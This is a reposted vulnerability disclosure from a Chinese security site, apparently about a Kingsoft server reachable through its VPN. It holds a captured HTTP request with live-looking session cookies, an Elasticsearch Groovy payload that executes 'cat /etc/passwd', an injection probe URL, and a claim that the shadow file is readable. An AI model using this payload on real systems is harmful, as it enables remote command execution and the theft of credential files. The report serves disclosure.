Cookie: DSSignInURL=/; DSFirstAccess=1459265428; DSCK:iciba_suggest_power=1%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A50%3A55%20GMTundefined%3B%20%20path%3D/%3B%20%20domain%3Dwww.iciba.com%3B%20; DSCK:CNZZDATA5816172=cnzz_eid%253D200427511-1459263058-%2526ntime%253D1459263058%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A01%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dcp.cmcm.com%3B%20; DSCK:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA4043849=cnzz_eid%253D570930719-1459257264-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459262939%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:Hm_lvt_5ac0d8ae079c0cc365232a92e683cd42=1459262371%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A58%3A02%20GMT%3B%20; DSCK:/:DSPT:Hm_lpvt_5ac0d8ae079c0cc365232a92e683cd42=1459267083%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20; DSCK:/:DSPT:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA1535626=cnzz_eid%253D1460670884-1459259525-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459264925%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSID=42fe302e7ee039b6fd97eb0c1b3b2607; DSLastAccess=1459267992
Content-Length: 410

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(/"java.io.BufferedReader/").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(/"java.io.InputStreamReader/").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(/"java.lang.Runtime/").getRuntime().exec(/"cat /etc/passwd/").getInputStream())).readLines()","lang": "groovy"}}}

code 区域
https://ksvpn.kingsoft.com/,DanaInfo=admin.comment.iciba.com+index.php?mod=index&zid=14%27

0

shadow可读

code 区域
https://ksvpn.kingsoft.com/,DanaInfo=admin.comment.iciba.com+index.php?mod=index&zid=14%27

1

修复方案:

改补的漏洞补,好好教育员工。。

版权声明:转载请注明来源 if、so@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 金山某处配置不当导致内部敏感信息泄露

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址